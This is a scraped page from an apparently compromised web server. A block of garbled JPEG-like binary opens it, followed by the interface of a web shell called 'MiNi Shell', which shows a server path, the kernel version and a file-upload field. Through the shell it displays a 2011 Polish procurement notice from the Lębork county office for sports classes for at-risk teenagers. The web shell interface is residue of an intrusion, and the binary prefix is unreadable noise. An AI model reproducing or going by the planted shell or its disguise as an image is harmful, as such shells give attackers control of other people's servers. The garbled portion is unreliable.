JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110603/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110603/156447-N-2011.html

<p class="kh_header"><b>Lębork: Zorganizowanie i przeprowadzenie zajęć sportowych - 2 części</b><br>
<b>Numer ogłoszenia: 156447 - 2011; data zamieszczenia: 03.06.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Starostwo Powiatowe w Lęborku , ul. Czołgistów 5, 84-300 Lębork, woj. pomorskie, tel. 059 8632810, faks 059 8632850.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie i przeprowadzenie zajęć sportowych - 2 części.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> a)	Część I - zorganizowanie i przeprowadzenie zajęć sportowych z zakresu sztuk walki dla 30 uczestników projektu Przyjaciele dzieci ulicy 
 
Przedmiot zamówienia obejmuje zorganizowanie i przeprowadzenie zajęć sportowych z zakresu sztuk walki dla 30 uczestników projektu (20 mężczyzn i 10 kobiet) w wieku 13-18 lat w ramach projektu Przyjaciele dzieci ulicy współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, Program Operacyjny Kapitał Ludzki, Priorytet VII Promocja integracji społecznej, działanie 7.2. Przeciwdziałanie wykluczeniu i wzmocnienie sektora ekonomii społecznej, poddziałanie 7.2.1 Aktywizacja zawodowa i społeczna osób zagrożonych wykluczeniem społecznym).

Program szkolenia powinien obejmować zajęcia praktyczne z zakresu sztuk walki
 
Liczba uczestników: 30 osób (20 mężczyzn i 10 kobiet) w wieku 13-18 lat. Uczestnicy będą podzieleni na 3 grupy po 10 osób. 1 grupa - 10 osób.

Czas trwania zajęć sportowych. 
Łączna liczba godzin szkoleniowych to 27 godzin zegarowych. Jedne zajęcia dla każdej grupy nie mogą trwać dłużej niż 1,5 godz. Zajęcia odbywać się będą w następujących miesiącach: 
czerwiec - łącznie dla 3 grup 4,5 godz. (każda grupa 1 raz w miesiącu po 1,5 godz.)  
lipiec - łącznie dla 3 grup 9 godz. (każda grupa 2 razy w miesiącu po 1,5 godz.)
sierpień - łącznie dla 3 grup 4,5 godz. (każda grupa 1 raz w miesiącu po 1,5 godz.)    
wrzesień - łącznie dla 3 grup 4,5 godz. (każda grupa 1 raz w miesiącu po 1,5 godz.)       
październik - łącznie dla 3 grup 4,5 godz. (każda grupa 1 raz w miesiącu po 1,5 godz.)  

Termin wykonania przedmiotu zamówienia:
Od czerwca 2011 r. - do 31 października 2011 r. 

Dodatkowe informacje (wymogi i obowiązki Wykonawcy i Zamawiającego)
a)	Wykonawca jest zobowiązany do przyjęcia na zajęcia sportowe skierowanych przez Zamawiającego uczestników.
b)	Wykonawca jest zobowiązany do przeprowadzenia zajęć w atrakcyjnej dla młodzieży formie.  
c)	Wykonawca zobowiązany jest do bieżącego monitorowania obecności uczestników na zajęciach w celu udokumentowania uczestnictwa w projekcie.
d)	Zamawiający zastrzega sobie prawo skierowania do odbycia kursu dodatkowe osoby w miejsce osób, które zrezygnują z udziału w projekcie.
e)	Zajęcia sportowe należy przeprowadzić w wybrane przez Zamawiającego dni powszednie od poniedziałku do piątku lub w weekendy (sobota). Terminy i godziny zajęć dostosowane będą do najbardziej pożądanych przez odbiorców zajęć sportowych. Harmonogram należy ustalić z koordynatorem projektu oraz musi on być przedstawiony do zatwierdzenia Zamawiającemu. 
f)	Zamawiający wskaże Wykonawcy nieodpłatnie pomieszczenie do zajęć sportowych. Przedmiot zamówienia będzie realizowany na terenie miasta Lęborka. 
g)	Wykonawca zobowiązany jest do wyposażenia każdego z uczestników w materiały szkoleniowe.
h)	Wykonawca zobowiązany jest do wydania uczestnikom kursu po jego ukończeniu, w ostatnim dniu zajęć odpowiednich zaświadczeń potwierdzających udział w zajęciach sportowych.
i)	 Wykonawca zobowiązany jest do odpowiedniego oznaczenia (zgodnie z wytycznymi w zakresie informacji 
i promocji, które zamieszczone są na stronie internetowej: www.efs.gov.pl) wszystkich miejsc i dokumentów bezpośrednio związanych z realizacją usługi tj. korespondencji dotyczącej Projektu i wszystkich innych dokumentów z nim związanych wychodzących od Wykonawcy poprzez m.in. zamieszczanie na zaświadczeniach, materiałach dydaktycznych itp., odpowiednich logotypów oraz informacji o współfinansowaniu. 
j)	Po zakończeniu każdego miesiąca Wykonawcy za wykonanie przedmiotu umowy przysługuje wynagrodzenie ryczałtowe. Zapłata następuje w terminie 14 dni od dnia doręczenia prawidłowo wystawionej faktury VAT lub rachunku oraz innej wymaganej przez Zamawiającego dokumentacji tj.: listę obecności, zestawienie liczby zrealizowanych godzin zajęć ze wskazaniem miejsca ich odbywania, listę osób potwierdzających odbiór materiałów szkoleniowych, listę osób potwierdzających odbiór poczęstunku. Dodatkowo rejestr wydanych zaświadczeń, kserokopie zaświadczeń potwierdzone za zgodność z oryginałem, listę osób potwierdzających odbiór zaświadczeń oraz komplet materiałów szkoleniowych, w które Wykonawca wyposażył uczestników oraz kserokopie opłaconej polisy ubezpieczeniowej potwierdzoną za zgodność z oryginałem.
k)	Wykonawca zapewni uczestnikom w przerwach między zajęciami drobny poczęstunek, w miejscu odbywania zajęć, składający się z:  
-	Wody mineralnej niegazowanej lub napój witaminowy - w ilości 1,0 l na osobę;
-	Słodkiej bułki - 1 bułka na osobę;
-	Owoców - 1 owoc na osobę; 
l)	Wykonawca każdorazowo po zakończeniu zajęć sportowych pozostawia pomieszczenie w stanie czystości. 
m)	Wykonawca zapewni w ramach poczęstunku świeże produkty dostępne na rynku. Wyżywienie powinno spełniać wymogi aktualnych wytycznych Instytutu Żywności i Żywienia. Świadczenie usług żywienia odbywać się powinno według ustawy z dnia 25 sierpnia 2006 roku o bezpieczeństwie żywności i żywienia (t.j. Dz. U. z 2010 r., Nr 136, poz. 914 z późn. zm.) 
n)	Wykonawca zobowiązany jest do przeprowadzenia wśród uczestników zajęć sportowych ankiet ewaluacyjnych na rozpoczęcie i zakończenie zajęć  - rozdanie i zebranie wypełnionych ankiet, które dostarczy Zamawiający. 
o)	Zamawiający zastrzega sobie (w związku z finansowaniem ze środków unijnych) oraz instytucjom upoważnionym do przeprowadzenia kontroli prawo wglądu do dokumentów Wykonawcy związanych 
z realizowaniem zamówienia, w tym dokumentów finansowych.
p)	Wykonawca zobowiązany jest do ubezpieczenia beneficjentów od następstw nieszczęśliwych wypadków przez cały okres trwania zajęć sportowych.
q)	Wykonawca każdorazowo informuje Zamawiającego (e-mail, telefon) o trudnościach lub problemach związanych z realizacją usługi, zwłaszcza z zachowaniem beneficjentów podczas usługi, stanem lub zachowaniem rodziców, opiekunów, streetworkerów. 


b)	Część II - zorganizowanie i przeprowadzenie zajęć sportowych na sali gimnastycznej dla 30 uczestników projektu Przyjaciele dzieci ulicy   
Przedmiot zamówienia obejmuje zorganizowanie i przeprowadzenie zajęć sportowych na sali gimnastycznej dla 30 uczestników projektu (20 mężczyzn i 10 kobiet) w wieku 13-18 lat w ramach projektu Przyjaciele dzieci ulicy współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, Program Operacyjny Kapitał Ludzki, Priorytet VII Promocja integracji społecznej, działanie 7.2. Przeciwdziałanie wykluczeniu i wzmocnienie sektora ekonomii społecznej, poddziałanie 7.2.1 Aktywizacja zawodowa i społeczna osób zagrożonych wykluczeniem społecznym).

Program szkolenia powinien obejmować:
I)	zajęcia praktyczne z różnych elementów tańca, m.in.:
- taniec nowoczesny, Hip - Hop, breakdance (łącznie dla wszystkich 3 grup 72 godz.)
II) trening z piłki koszykowej, z piłki nożnej (łącznie dla wszystkich 3 grup 72 godz.) 
 
Liczba uczestników: 30 osób (20 mężczyzn i 10 kobiet) w wieku 13-18 lat. Uczestnicy będą podzieleni na 3 grupy po 10 osób. 1 grupa - 10 osób.

Czas trwania zajęć sportowych
Łączna liczba godzin szkoleniowych to 144 godzin lekcyjnych. Jedne zajęcia dla każdej grupy nie mogą trwać dłużej niż 2 godz. lekcyjne (2 x 45 min.) Zajęcia odbywać się będą w następujących miesiącach: 
czerwiec - łącznie dla wszystkich 3 grup po 6 godz. części I i po 6 godz. części II (na każdą grupę po 4 godz. lekcyjnych)  
lipiec - łącznie dla wszystkich 3 grup po 30 godz. części I i po 30 godz. części II (na każdą grupę po 20 godz. lekcyjnych)  
sierpień - łącznie dla wszystkich 3 grup po 12 godz. części I i po 12 godz. części II (na każdą grupę po 8 godz. lekcyjnych)      
wrzesień - łącznie dla wszystkich 3 grup po 12 godz. części I i po 12 godz. części II (na każdą grupę po 8 godz. lekcyjnych)      
październik - łącznie dla wszystkich 3 grup po 12 godz. części I i po 12 godz. części II (na każdą grupę po 8 godz. lekcyjnych)     	

Termin wykonania przedmiotu zamówienia:
Od czerwca 2011 r. - do 31 października 2011 r. 

Dodatkowe informacje (wymogi i obowiązki Wykonawcy i Zamawiającego)
a)	Wykonawca jest zobowiązany do przyjęcia na zajęcia sportowe skierowanych przez Zamawiającego uczestników. 
b)	Wykonawca zobowiązany jest do bieżącego monitorowania obecności uczestników na zajęciach w celu udokumentowania uczestnictwa w projekcie.
c)	Zamawiający zastrzega sobie prawo skierowania do odbycia kursu dodatkowe osoby w miejsce osób, które zrezygnują z udziału w projekcie.
d)	Zajęcia sportowe należy przeprowadzić w wybrane przez Zamawiającego dni powszednie od poniedziałku do piątku lub w weekendy (sobota). Terminy i godziny zajęć dostosowane będą do najbardziej pożądanych przez odbiorców zajęć sportowych. Harmonogram należy ustalić z koordynatorem projektu oraz musi on być przedstawiony do zatwierdzenia Zamawiającemu. 
e)	Zamawiający wskaże Wykonawcy nieodpłatnie pomieszczenie do zajęć sportowych. Przedmiot zamówienia będzie realizowany na terenie miasta Lęborka. 
f)	Wykonawca zobowiązany jest do wydania uczestnikom kursu po jego ukończeniu, w ostatnim dniu zajęć odpowiednich zaświadczeń potwierdzających udział w zajęciach sportowych.
g)	 Wykonawca zobowiązany jest do odpowiedniego oznaczenia (zgodnie z wytycznymi w zakresie informacji 
i promocji, które zamieszczone są na stronie internetowej: www.efs.gov.pl) wszystkich miejsc i dokumentów bezpośrednio związanych z realizacją usługi tj. korespondencji dotyczącej Projektu i wszystkich innych dokumentów z nim związanych wychodzących od Wykonawcy poprzez m.in. zamieszczanie na zaświadczeniach, materiałach dydaktycznych itp., odpowiednich logotypów oraz informacji o współfinansowaniu. 
h)	Po zakończeniu każdego miesiąca Wykonawcy za wykonanie przedmiotu umowy przysługuje wynagrodzenie ryczałtowe. Zapłata następuje w terminie 14 dni od dnia doręczenia prawidłowo wystawionej faktury VAT lub rachunku oraz innej wymaganej przez Zamawiającego dokumentacji tj.: listę obecności, zestawienie liczby zrealizowanych godzin zajęć ze wskazaniem miejsca ich odbywania. Dodatkowo rejestr wydanych zaświadczeń, kserokopie zaświadczeń potwierdzone za zgodność z oryginałem, listę osób potwierdzających odbiór zaświadczeń.
i)	Wykonawca każdorazowo po zakończeniu zajęć sportowych pozostawia pomieszczenie w stanie czystości. 
j)	Wykonawca zobowiązany jest do przeprowadzenia wśród uczestników zajęć sportowych ankiet ewaluacyjnych na rozpoczęcie i zakończenie zajęć  - rozdanie i zebranie wypełnionych ankiet, które dostarczy Zamawiający. 
k)	Zamawiający zastrzega sobie (w związku z finansowaniem ze środków unijnych) oraz instytucjom upoważnionym do przeprowadzenia kontroli prawo wglądu do dokumentów Wykonawcy związanych 
z realizowaniem zamówienia, w tym dokumentów finansowych.
l)	Wykonawca zobowiązany jest do ubezpieczenia beneficjentów od następstw nieszczęśliwych wypadków przez cały okres trwania zajęć sportowych.
m)	Wykonawca każdorazowo informuje Zamawiającego (e-mail, telefon) o trudnościach/problemach związanych 
z realizacją usługi, zwłaszcza z zachowaniem beneficjentów podczas usługi, stanem lub zachowaniem rodziców, opiekunów, streetworkerów..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 92.00.00.00-1, 92.60.00.00-7, 92.61.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek powyższy zostanie spełniony, jeżeli Wykonawca przedstawi:
-	Wykaz osób, które będą uczestniczyć w wykonaniu zamówienia, wraz z informacja na temat ich wykształcenia, kwalifikacji zawodowych i doświadczenia niezbędnych do wykonania zamówienia oraz informacją o podstawie dysponowania tymi osobami - zał. nr 4 do SIWZ 
-	Oświadczenie, że dysponuje lub będzie dysponować osobą, która będzie  uczestniczyć 
w wykonywaniu zamówienia - osoba ta spełnia poniższe wymaganie: - Oświadczenie Wykonawcy - Zał. Nr 5 do SIWZ

Dotyczy części I:
Wymagania niezbędne dotyczące osoby uczestniczącej w wykonaniu zamówienia: 
1) posiadanie kwalifikacji instruktora sportu lub trenera w danej dziedzinie sportu, 
2) w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, przeprowadził warsztaty/zajęcia sportowe/treningi  w podobnym zakresie z osobami w wieku 13 - 18 lat - oświadczenie potwierdzające doświadczenie,
3)  charakteryzuje się stabilnością emocjonalną i odpornością na stres.

Dotyczy części II:
1) posiadanie kwalifikacji instruktora sportu lub trenera w danej dziedzinie sportu 
2) w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, przeprowadził warsztaty/zajęcia sportowe/treningi  w podobnym zakresie z osobami w wieku 13 - 18 lat - oświadczenie potwierdzające doświadczenie,
3)  charakteryzuje się stabilnością emocjonalną i odpornością na stres.

Jeżeli Wykonawca wykazując spełnianie warunków posiadania wiedzy i doświadczenia, potencjału technicznego, osób zdolnych do wykonania zamówienia lub zdolnościach finansowych, polega na zasobach innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków winien udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W przypadku zdarzeń losowych oraz szczególnych okoliczności, których nie można było przewidzieć w chwili zawarcia umowy, istnieje możliwość wprowadzenia zmian do zawartej umowy w zakresie:
a)	przesunięcia terminu wykonania przedmiotu zamówienia
b)	zmiany osób wskazanych jako prowadzące zajęcia sportowe,
c)	nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia lub obowiązki jednej ze stron.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.powiat.leborski.samorzady.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w siedzibie zamawiającego.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.06.2011 godzina 09:00, miejsce: w Biurze Obsługi Interesanta w Starostwie Powiatowym w Lęborku, ul. Czołgistów 5, 84-300 Lębork.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> projekt pn. Przyjaciele dzieci ulicy współfinansowany ze środków Unii Europejskiej 
w ramach Europejskiego Funduszu Społecznego (Program Operacyjny Kapitał Ludzki, Priorytet VII Promocja integracji społecznej, działanie 7.2. Przeciwdziałanie wykluczeniu i wzmocnienie sektora ekonomii społecznej, poddziałanie 7.2.1 Aktywizacja zawodowa i społeczna osób zagrożonych wykluczeniem społecznym).</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część I - zorganizowanie i przeprowadzenie zajęć sportowych z zakresu sztuk walki dla 30 uczestników projektu Przyjaciele dzieci ulicy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje zorganizowanie i przeprowadzenie zajęć sportowych z zakresu sztuk walki dla 30 uczestników projektu (20 mężczyzn i 10 kobiet) w wieku 13-18 lat w ramach projektu Przyjaciele dzieci ulicy współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, Program Operacyjny Kapitał Ludzki, Priorytet VII Promocja integracji społecznej, działanie 7.2. Przeciwdziałanie wykluczeniu i wzmocnienie sektora ekonomii społecznej, poddziałanie 7.2.1 Aktywizacja zawodowa i społeczna osób zagrożonych wykluczeniem społecznym).

Szczegółowy opis przedmiotu zamówienia - załącznik nr 7a..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 92.00.00.00-1, 92.60.00.00-7, 92.61.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Część II - zorganizowanie i przeprowadzenie zajęć sportowych na sali gimnastycznej dla 30 uczestników projektu Przyjaciele dzieci ulicy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje zorganizowanie i przeprowadzenie zajęć sportowych na sali gimnastycznej dla 30 uczestników projektu (20 mężczyzn i 10 kobiet) w wieku 13-18 lat w ramach projektu Przyjaciele dzieci ulicy współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, Program Operacyjny Kapitał Ludzki, Priorytet VII Promocja integracji społecznej, działanie 7.2. Przeciwdziałanie wykluczeniu i wzmocnienie sektora ekonomii społecznej, poddziałanie 7.2.1 Aktywizacja zawodowa i społeczna osób zagrożonych wykluczeniem społecznym).

Szczegółowy opis przedmiotu zamówienia - załącznik nr 7b..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 92.00.00.00-1, 92.60.00.00-7, 92.61.00.00-0.</p></li>
